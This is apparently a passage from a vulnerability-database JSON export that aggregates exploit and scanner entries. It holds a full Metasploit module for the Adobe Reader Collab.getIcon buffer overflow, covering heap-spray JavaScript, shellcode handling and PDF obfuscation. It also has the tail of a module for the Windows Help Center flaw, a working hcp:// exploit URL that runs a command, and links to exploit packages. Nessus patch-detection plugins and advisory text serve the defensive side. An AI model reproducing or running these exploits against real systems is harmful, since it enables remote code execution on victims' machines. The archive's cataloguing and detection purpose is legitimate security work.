#{path} ...\") \nsend_not_found(cli) \nreturn \nend \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \ndef exploit \n@random_dir = rand_text_alpha(rand(2)+1) \n@asx_file = rand_text_alpha(rand(2)+1) + \".asx\" \n@start_help = rand_text_alpha(rand(2)+1) + \".html\" \n@payload = rand_text_alpha(rand(2)+1) + \".exe\" \n@img_file = rand_text_alpha(rand(2)+1) + \".gif\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nraise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' \nend \n \nsuper \nend \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91768/ms10_042_helpctr_xss_cmd_exec.rb.txt"}, {"lastseen": "2016-12-05T22:21:36", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Adobe Collab.getIcon() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83139", "href": "https://packetstormsecurity.com/files/83139/Adobe-Collab.getIcon-Buffer-Overflow.html", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Collab.getIcon() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional \n< 8.1.4. 
By creating a specially crafted pdf that a contains malformed Collab.getIcon() \ncall, an attacker may be able to execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', \n'jduck <metasploit[at]qoop.org>', ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2009-0927' ], \n[ 'OSVDB', '53647' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Adobe Reader v8.1.4 (Windows XP SP3 English)', { 'Ret' => '' } ], \n], \n'DisclosureDate' => 'Mar 24 2009', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \n \nend \n \ndef exploit \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Make some nops \nnops = Rex::Text.to_unescape(make_nops(4)) \n \n# Randomize variables \nrand1 = rand_text_alpha(rand(100) + 1) \nrand2 = rand_text_alpha(rand(100) + 1) \nrand3 = rand_text_alpha(rand(100) + 1) \nrand4 = rand_text_alpha(rand(100) + 1) \nrand5 = rand_text_alpha(rand(100) + 1) \nrand6 = rand_text_alpha(rand(100) + 1) \nrand7 = rand_text_alpha(rand(100) + 1) \nrand8 = rand_text_alpha(rand(100) + 1) \nrand9 = rand_text_alpha(rand(100) + 1) \nrand10 = rand_text_alpha(rand(100) + 1) \nrand11 = rand_text_alpha(rand(100) + 1) \nrand12 = rand_text_alpha(rand(100) + 1) \n \nscript = %Q| \nvar #{rand1} = unescape(\"#{shellcode}\"); \nvar #{rand2} =\"\"; \nfor (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\"); \n#{rand4} = #{rand2} + #{rand1}; \n#{rand5} = unescape(\"#{nops}\"); \n#{rand6} = 20; \n#{rand7} = #{rand6}+#{rand4}.length \nwhile (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5}; \n#{rand8} = #{rand5}.substring(0, #{rand7}); 
\n#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7}); \nwhile(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8}; \n#{rand10} = new Array(); \nfor (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4}; \nvar #{rand12} = unescape(\"%09\"); \nwhile(#{rand12}.length < 0x4000) #{rand12}+=#{rand12}; \n#{rand12} = \"N.\"+#{rand12}; \nCollab.getIcon(#{rand12}); \n| \n \n# Create the pdf \npdf = make_pdf(script) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \ndef make_pdf(js) \n \nxref = [] \neol = \"\\x0d\\x0a\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? 
\npdf = \"%%PDF-%d.%d\" % [1 + rand(2), 1 + rand(5)] << eol \npdf << \"%\" << RandomNonASCIIString(4) << eol \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj \nxref << pdf.length \npdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \npdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \npdf << \"%%EOF\" << eol \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83139/adobe_geticon.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T18:10:37", "description": "BUGTRAQ ID: 40725,40721\r\nCVE ID: 
CVE-2010-1885\r\n\r\nWindows is a very popular operating system released by Microsoft.\r\n\r\nWindows provides the Help and Support Center by default for accessing online documentation; help documents can be accessed directly through URLs of the form hcp://. When an hcp:// URL is invoked through the registered protocol handler, the command-line argument /fromhcp is passed to the Help Center application; this flag switches the Help Center into a restricted mode that only allows whitelisted help documents and parameters. However, this whitelist implementation is not secure and can be bypassed.\r\n\r\nBefore validation, the URL is first normalized and unescaped using the MPC::HTML::UrlUnescapeW() function, which uses MPC::HexToNum() to translate URL escape sequences into raw characters. The relevant code is as follows:\r\n\r\n.text:0106684C Unescape:\r\n.text:0106684C cmp di, '%' ; di contains the current wchar in the input URL.\r\n.text:01066850 jnz short LiteralChar ; if this is not a '%', it must be a literal character.\r\n.text:01066852 push esi ; esi contains a pointer to the current position in URL to unescape.\r\n.text:01066853 call ds:wcslen ; find the remaining length.\r\n.text:01066859 cmp word ptr [esi], 'u' ; if the next wchar is 'u', this is a unicode escape and I need 4 xdigits.\r\n.text:0106685D pop ecx ; this sequence calculates the number of wchars needed (4 or 2).\r\n.text:0106685E setz cl ; i.e. 
%uXXXX (four needed), or %XX (two needed).\r\n.text:01066861 mov dl, cl\r\n.text:01066863 neg dl\r\n.text:01066865 sbb edx, edx\r\n.text:01066867 and edx, 3\r\n.text:0106686A inc edx\r\n.text:0106686B inc edx\r\n.text:0106686C cmp eax, edx ; test if I have enough characters in input to decode.\r\n.text:0106686E jl short LiteralChar ; if not enough, this '%' is considered literal.\r\n.text:01066870 test cl, cl\r\n.text:01066872 movzx eax, word ptr [esi+2]\r\n.text:01066876 push eax\r\n.text:01066877 jz short NotUnicode\r\n.text:01066879 call HexToNum ; call MPC::HexToNum() to convert this nibble (4 bits) to an integer.\r\n.text:0106687E mov edi, eax ; edi contains the running total of the value of this escape sequence.\r\n.text:01066880 movzx eax, word ptr [esi+4]\r\n.text:01066884 push eax\r\n.text:01066885 shl edi, 4 ; shift edi left 4 positions to make room for the next digit, i.e. total <<= 4;\r\n.text:01066888 call HexToNum\r\n.text:0106688D or edi, eax ; or the next value into the 4-bit gap, i.e. total |= val.\r\n.text:0106688F movzx eax, word ptr [esi+6]; this process continues for the remaining wchars.\r\n.text:01066893 push eax\r\n.text:01066894 shl edi, 4\r\n.text:01066897 call HexToNum\r\n.text:0106689C or edi, eax\r\n.text:0106689E movzx eax, word ptr [esi+8]\r\n.text:010668A2 push eax\r\n.text:010668A3 shl edi, 4\r\n.text:010668A6 call HexToNum\r\n.text:010668AB or edi, eax\r\n.text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.\r\n.text:010668B0 jmp short FinishedEscape\r\n.text:010668B2\r\n.text:010668B2 NotUnicode:\r\n.text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. 
%41, instead of %u0041)\r\n.text:010668B7 mov edi, eax\r\n.text:010668B9 movzx eax, word ptr [esi]\r\n.text:010668BC push eax\r\n.text:010668BD call HexToNum\r\n.text:010668C2 shl eax, 4\r\n.text:010668C5 or edi, eax\r\n.text:010668C7 add esi, 4 ; account for number of bytes (not chars) consumed by the escape.\r\n.text:010668CA\r\n.text:010668CA FinishedEscape:\r\n.text:010668CA test di, di\r\n.text:010668CD jz short loc_10668DA\r\n.text:010668CF\r\n.text:010668CF LiteralChar:\r\n.text:010668CF push edi ; append the final value to the normalised string using a std::string append.\r\n.text:010668D0 mov ecx, [ebp+unescaped]\r\n.text:010668D3 push 1\r\n.text:010668D5 call std::string::append\r\n.text:010668DA mov di, [esi] ; fetch the next input character.\r\n.text:010668DD test di, di ; have we reached the NUL terminator?\r\n.text:010668E0 jnz Unescape ; process next char.\r\n\r\nThe way MPC::HexToNum() handles error conditions is flawed; the relevant code is as follows:\r\n\r\n.text:0102D32A mov edi, edi\r\n.text:0102D32C push ebp\r\n.text:0102D32D mov ebp, esp ; function prologue.\r\n.text:0102D32F mov eax, [ebp+arg_0] ; fetch the character to convert.\r\n.text:0102D332 cmp eax, '0'\r\n.text:0102D335 jl short CheckUppercase ; is it a digit?\r\n.text:0102D337 cmp eax, '9'\r\n.text:0102D33A jg short CheckUppercase\r\n.text:0102D33C add eax, 0FFFFFFD0h ; atoi(), probably written val - '0' and optimised by compiler.\r\n.text:0102D33F jmp short Complete\r\n.text:0102D341 CheckUppercase:\r\n.text:0102D341 cmp eax, 'A'\r\n.text:0102D344 jl short CheckLowercase ; is it an uppercase xdigit?\r\n.text:0102D346 cmp eax, 'F'\r\n.text:0102D349 jg short CheckLowercase\r\n.text:0102D34B add eax, 0FFFFFFC9h ; atoi()\r\n.text:0102D34E jmp short Complete\r\n.text:0102D350 CheckLowercase:\r\n.text:0102D350 cmp eax, 'a'\r\n.text:0102D353 jl short Invalid ; lowercase xdigit?\r\n.text:0102D355 cmp eax, 'f'\r\n.text:0102D358 jg short 
Invalid\r\n.text:0102D35A add eax, 0FFFFFFA9h ; atoi()\r\n.text:0102D35D jmp short Complete\r\n.text:0102D35F Invalid:\r\n.text:0102D35F or eax, 0FFFFFFFFh ; invalid character, return -1\r\n.text:0102D362 Complete:\r\n.text:0102D362 pop ebp\r\n.text:0102D363 retn 4\r\n\r\nMPC::HTML::UrlUnescapeW() does not check the return code of MPC::HexToNum() as required, so content may still be appended to the std::string; the resulting computation error in the code can then be used to bypass the /fromhcp whitelist.\r\n\r\nAn attacker can exploit this vulnerability to execute arbitrary commands through the input validation error that occurs when a specially crafted hcp:// URL opens the sysinfomain.htm help document.\n\nMicrosoft Windows XP SP3\r\nMicrosoft Windows XP SP2\r\nMicrosoft Windows Server 2003 SP2\nTemporary workaround:\r\n\r\n* Temporarily remove the registration of the HCP protocol\r\n\r\n Run in a command window:\r\n \r\n reg export HKEY_CLASSES_ROOT\\HCP hcp_backup.reg\r\n \r\n This backs up the relevant registry entries to a backup file.\r\n \r\n Then run:\r\n \r\n reg delete HKEY_CLASSES_ROOT\\HCP /f\r\n \r\n 
This deletes the relevant registry entries and removes the system's HCP protocol registration. After the patch released by Microsoft for this vulnerability has been installed, double-click the backed-up hcp_backup.reg file to import the data into the registry and restore HCP support.\r\n\r\nVendor patch:\r\n\r\nMicrosoft\r\n---------\r\nThe vendor has not yet provided a patch or upgrade; we recommend that users of this software monitor the vendor's homepage for the latest version:\r\n\r\nhttp://www.microsoft.com/technet/security/", "published": "2010-06-12T00:00:00", "type": "seebug", "title": "Microsoft Windows Help and Support Center Whitelist Restriction Bypass Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-06-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19788", "id": "SSV:19788", "sourceData": "\n hcp://services/search?query=anything&amp;topic=hcp://system/sysinfo/sysinfomain.htm%\r\nA%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%\r\n%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A\r\n%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%\r\nA%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3\r\nCscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%\r\n3C/script%3E\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19788", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:37:59", "description": "No description provided by source.", "published": "2009-09-04T00:00:00", "title": "Adobe 
Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-09-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12196", "id": "SSV:12196", "sourceData": "\n #!/usr/bin/env python\r\n#\r\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\r\n# evil_pdf.py, tested on Operating Systems:\r\n# Windows XP SP3 English/French\r\n# Windows 2003 SP2 English\r\n# with Application versions:\r\n# Adobe Reader 9.0.0/8.1.2 English/French\r\n# Test methods:\r\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\r\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.\r\n# [Coromputer] raised from the ashes.\r\n#\r\n\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\nback: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12196"}, {"lastseen": "2017-11-19T14:03:09", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66863", "id": "SSV:66863", "sourceData": "\n #!/usr/bin/env python\r\n#\r\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\r\n# evil_pdf.py, tested on Operating Systems:\r\n# Windows XP SP3 English/French\r\n# Windows 2003 SP2 English\r\n# with Application versions:\r\n# Adobe Reader 9.0.0/8.1.2 English/French\r\n# Test methods:\r\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\r\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). 
All rights reserved.\r\n# [Coromputer] raised from the ashes.\r\n#\r\n\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\nhttp://exploit-db.com/sploits/2009-CVE-2009-0927_package.zip\r\n\r\n# milw0rm.com [2009-09-03]\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66863"}], "nessus": [{"lastseen": "2020-09-14T18:30:44", "description": "The Windows Help and Support Center does not properly validate HCP\nURLs, which are associated normally with the Windows Help and Support\nCenter.\n\nIf an attacker can trick a user on the affected host into viewing a\nspecially crafted web page or clicking on a specially crafted link in\nan email message, he can leverage this issue to execute arbitrary\ncode subject to the user's privileges.", "edition": 23, "published": "2010-07-13T00:00:00", "title": "MS10-042: Vulnerability in Help and Support Center Could Allow Remote Code Execution (2229593)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1885"], "modified": "2010-07-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-042.NASL", "href": "https://www.tenable.com/plugins/nessus/47710", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47710);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\"CVE-2010-1885\");\n script_bugtraq_id(40725);\n script_xref(name:\"CERT\", value:\"578319\");\n script_xref(name:\"EDB-ID\", value:\"13808\");\n script_xref(name:\"IAVA\", value:\"2010-A-0095-S\");\n script_xref(name:\"MSFT\", value:\"MS10-042\");\n script_xref(name:\"MSKB\", value:\"2229593\");\n\n script_name(english:\"MS10-042: Vulnerability in Help and Support Center Could Allow Remote Code Execution (2229593)\");\n script_summary(english:\"Checks version of Helpsvc.exe\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to execute arbitrary code on the remote Windows host\nthrough the Windows Help and Support Center feature.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows Help and Support Center does not properly validate HCP\nURLs, which are associated normally with the Windows Help and Support\nCenter.\n\nIf an attacker can trick a user on the affected host into viewing a\nspecially crafted web page or clicking on a specially crafted link in\nan email message, he can leverage this issue to execute arbitrary\ncode subject to the user's privileges.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-042\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?da3bd311\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-1885\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Help Center XSS and Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/13\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-042';\nkbs = make_list(\"2229593\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'2,3', win2003:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = '2229593';\nif (\n # Windows 2003 and XP x64\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Helpsvc.exe\", version:\"5.2.3790.4726\", dir:\"\\PCHEALTH\\HELPCTR\\Binaries\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Helpsvc.exe\", version:\"5.1.2600.5997\", dir:\"\\PCHEALTH\\HELPCTR\\Binaries\", bulletin:bulletin, kb:kb) ||\n 
hotfix_is_vulnerable(os:\"5.1\", sp:2, arch:\"x86\", file:\"Helpsvc.exe\", version:\"5.1.2600.3720\", dir:\"\\PCHEALTH\\HELPCTR\\Binaries\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/MS10-042\", value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T06:15:34", "description": "The remote Microsoft Data Access Component (MDAC) server is vulnerable to a\nflaw that could allow a local administrator to elevate his privileges to the\n'system' level, thus gaining the complete control over the remote system.", "edition": 32, "published": "2006-04-11T00:00:00", "title": "MS06-014: Vulnerability in MDAC Could Allow Code Execution (911562)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0003"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS06-014.NASL", "href": "https://www.tenable.com/plugins/nessus/21211", "sourceData": "#\n# Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21211);\n script_version(\"1.34\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2006-0003\");\n script_bugtraq_id(17462);\n script_xref(name:\"MSFT\", value:\"MS06-014\");\n script_xref(name:\"MSKB\", value:\"911562\");\n\n script_name(english:\"MS06-014: Vulnerability in MDAC Could Allow Code Execution (911562)\");\n script_summary(english:\"Checks the version of MDAC\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A local administrator could elevate his privileges on the remote host, through a\nflaw in the MDAC server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Microsoft Data Access Component (MDAC) server is vulnerable to a\nflaw that could allow a local administrator to elevate his 
privileges to the\n'system' level, thus gaining the complete control over the remote system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-014\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/04/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 
'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-014';\nkb = '911562';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\npath = hotfix_get_commonfilesdir() + '\\\\system\\\\msadc\\\\';\n\nif (!path) exit(1, \"Failed to get the common files directory.\");\n\nshare = hotfix_path2share(path:path);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"msadco.dll\", version:\"2.80.1062.0\", path:path, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"msadco.dll\", version:\"2.82.2644.0\", path:path, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"msadco.dll\", version:\"2.71.9053.0\", path:path, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"msadco.dll\", version:\"2.81.1124.0\", path:path, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"msadco.dll\", version:\"2.53.6306.0\", path:path, bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_warning();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T18:30:40", "description": "If a remote attacker can trick a user on the affected host 